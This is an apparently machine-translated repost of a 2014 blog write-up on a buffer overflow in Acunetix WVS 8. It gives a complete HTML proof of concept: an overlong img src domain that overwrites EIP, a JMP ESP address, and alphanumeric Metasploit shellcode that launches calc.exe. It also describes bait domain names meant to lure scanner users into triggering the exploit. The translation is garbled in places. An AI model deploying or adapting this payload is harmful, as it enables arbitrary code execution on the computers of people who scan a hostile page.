Livers, 2014/04/26 13:06
From: http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
0 x00 overview
A few weeks ago, the author published an article about WINRAR 0DAY (file name spoofing). It got a lot of attention and inquiries, so this time it released a 0Day (the most popular leak scan tool WVS). ACUNETIX 8 (build 20120704) ACUNETIX 8 (Build 20120704) The author intends to make attackers think twice before pressing the scan button with WVS (this is real active protection).
0x01 Vulnerability Analysis
ACUNETIX is a powerful miss scan tool that many novices like to use for scanning.
During the scan initialization phase, there is an additional option as shown below
This makes the author interested. Through analysis, it can be concluded that WVS extracts some resource requests similar to HTTP response parsing:
#! html <img src=http://externalSource.com/someimg.png > <a href=http://externalSource.com/ ></a> Etc...Copy the codeThe author further analyzed this process and found, to his surprise, that when a certain external domain name exceeded 268 bytes, WVS would crash. The author began to try to construct a domain name with a length of >=268 bytes: the first test is as follows
<A href= "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">Copy the codeMount to the WVS access site with Immunity Debugger: Edx is overwritten by 0x41(A) and access to the segment crashes:
The author intended to use SHE overflow to execute shellCode, but it was cumbersome.
Here’s the catch:
Because it’s a URL string, avoid similar ENCODING of URLS
0x22 ("), 0x23 (#), 0x24 ($), 0x25 (%), 0x5C (), 0x2F (/)
Copy the codeSo the shellcode here is not only ASCII, but also removes urL-encoded characters, because it’s so hard to get around the SHE protection.
The idea proposed by the author is to use the previously controllable EDX to construct a readable address, while paying attention to the addition of 8H to the constructed EDX address
#! bash MOVE ECX, DWORD PTR DS: [EDX-8];Copy the codeEdx must satisfy the following two conditions:
1.[edx] readable 2. ASCII compliant symbols that have not been escaped by the URLCopy the codeFinally, the corresponding ASCII value of 0x663030XX is used.
The previous test accurately tested that the URL overflows at 268 bytes (excluding http://), and the overflow point is 269 here (starting at 500F).
<img src="http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA500fBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB">Copy the codeUse WVS scanning
After Ret, eIP is overwritten BBBB 0x42424242.
So I’m going to select the shellcode location, eax is the argument to the call function, it’s just 268 bytes of A, Esp is obviously selected (because it is large enough for shellcode with 268 bytes ASCII encoding) to control eIP and find the storage space of shellcode.
In addition, JMP ESP used to use the public general address, which requires ASCII characters and is not url encoded, the author used the system SxS.dll 0x7e79515D, ASCII encoding]Qy~ combined together the whole POC is
<img SRC = "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA500fBBBB]Qy~BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB ">Copy the codeFinally, metasploit’s Alphanumeric Shell module generates a pure ASCII shellcode that is not urL-encoded for calc.exe. You can also use MST to generate other shellcodes. Select address [edx] and WVS (deP compilation option is not enabled), so bypass DEP protection.
<img src="http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIHZXL9ID41 4ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKPKZ UDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQKUNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLS KGBLYKOY7NWWLNG6LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15XUXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L03 4LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA">Copy the code0 x02 use
The author is having fun here, because this point is valid only if the WVS person chooses the one below.
So, the author is very lewd to construct some very tempting external domain names
SQLINJECTION "XSS" "CSRF" And so on... <html> <img src="http://SQLInjection................................................................................................ . AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ 2AB2BB0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV 261UKL71ME2NMP7FQY0NOHKPKZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQKUNKMJPOOCRODCMDKR0PGQD0EYIR VMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWLNG6LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15XUXYUNP1BP F4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA "> < img src="http://XSS......................................................................................................... ..." > <img src="http://CSRF........................................................................................................ ..." > <img src="http://DeepScan.................................................................................................... ..." > <img src="http://NetworkScan................................................................................................. ..." > <img src="http://DenialOfService............................................................................................. ..." > </html>Copy the codeThe diagram below:
0 x03 summary
I tested Wvs8.0 build 20120704 and it was able to pop calC successfully.
Some people say that the wvs8.0 update also has this problem, I tested the following version:
Wvs8.0 20130416 Version Various versions of Wvs9
There is no such problem.
Author gives exp download.